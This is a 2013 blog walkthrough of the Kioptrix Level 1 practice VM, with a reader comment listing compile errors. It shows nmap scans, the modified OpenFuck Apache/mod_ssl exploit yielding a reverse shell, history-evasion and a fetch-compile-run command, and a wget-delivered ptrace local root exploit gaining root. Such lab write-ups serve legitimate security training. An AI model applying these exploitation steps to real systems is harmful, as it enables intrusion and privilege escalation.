Saturday, November 2, 2013

Kioptrix Level 1 - Walkthrough

I started with loading the VM on the same network as my Kali Linux was. I started with a ping scan on the network, cause I didn't know what IP the VM got.

root@kali:~# nmap -P0


Nmap scan report for
Host is up (0.00051s latency).
Not shown: 994 closed ports
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm
MAC Address: 00:0C:29:02:82:DB (VMware)


After that I found the host I did a more exhaustive TCP SYN scan on the host.

root@kali:~# nmap -sS -A

Starting Nmap 6.40 ( ) at 2013-11-02 20:04 CET

Nmap scan report for
Host is up (0.00048s latency).
Not shown: 994 closed ports
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T08:32:06+00:00
|_Not valid after:  2010-09-26T08:32:06+00:00
|_ssl-date: 2013-11-02T20:07:02+00:00; +1h01m50s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:02:82:DB (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:

|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>


1   0.48 ms

From the above list we can see that we have a bunch of pretty old services. I did a Google search for the Apache version, and came across the following exploit:

Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)

It was really promising. We had SSL service running as well. After downloading I had to add two lines to the exploit code in order to get it compiled + commented out a command, which was not needed.

#include <openssl/rc4.h>
#include <openssl/md5.h> 

// wget; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"

Once it compiled, I searched for the version I need and run it (we know the Apache version, and that the Linux is RedHat), and voila... I got a reverse shell, with limited privileges.

root@kali:~# ./OpenFuck | grep 1.3.20
    0x02 - Cobalt Sun 6.0 (apache-1.3.20)
    0x27 - FreeBSD (apache-1.3.20)
    0x28 - FreeBSD (apache-1.3.20)
    0x29 - FreeBSD (apache-1.3.20+2.8.4)
    0x2a - FreeBSD (apache-1.3.20_1)
    0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
    0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
    0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
    0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
    0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
    0x7e - Slackware Linux 8.0 (apache-1.3.20)
    0x86 - SuSE Linux 7.3 (apache-1.3.20)

root@kali:~# ./OpenFuck 0x6b


* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *

Establishing SSL connection

cipher: 0x4043808c   ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ unset HISTFILE; cd /tmp;
bash-2.05$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$ uname -r
uname -r

Now I only need to get root. The original exploit wanted to download a ptrace exploit. After checking the Linux kernel version, I could see that it could work, so I downloaded the code and compiled it.

Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit

I had to modify one line in the exploit in order to get it work:

#include <linux/user.h>
#include <sys/user.h>

I copied it to my Apache directory and copied it to the victim machine with wget. After running it, I got root!

bash-2.05$ wget
           => `p'
Connecting to connected!
HTTP request sent, awaiting response... 200 OK
Length: 9,210

    0K ........                                              100% @ 691.86 KB/s

15:42:35 (691.86 KB/s) - `p' saved [9210/9210]

bash-2.05$ ls -l

ls -l
total 9
-rw-r--r--    1 apache   apache       9210 Nov  2 14:40 p
bash-2.05$ chmod 777 p
chmod 777 p

bash-2.05$ ./p

[+] Attached to 5990
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...


uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
cd /root
ls -l
total 2
-rw-r--r--    1 root     root         1303 Sep 26  2009 anaconda-ks.cfg

This is only my way doing it, as this is the entry level, there could be other ways to get in.

1 comment:

Anonymous said...

I get these errors when I try to compile it. I have added the headers to it and everything but it seems like my amazing C experience isn't helping ^,^ ...

764.c:645:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
764.c: In function ‘read_ssl_packet’:
764.c:847:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
764.c:847:19: note: each undeclared identifier is reported only once for each function it appears in
764.c: In function ‘get_server_hello’:
764.c:979:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
if (*(p++) != SSL2_MT_SERVER_HELLO) {
764.c: In function ‘send_client_master_key’:
764.c:1071:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
if (pkey->type != EVP_PKEY_RSA) {
764.c: In function ‘get_server_verify’:
764.c:1148:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
if (buf[0] != SSL2_MT_SERVER_VERIFY) {
764.c: In function ‘send_client_finished’:
764.c:1160:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
764.c: In function ‘get_server_finished’:
764.c:1173:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)
if (buf[0] != SSL2_MT_SERVER_FINISHED) {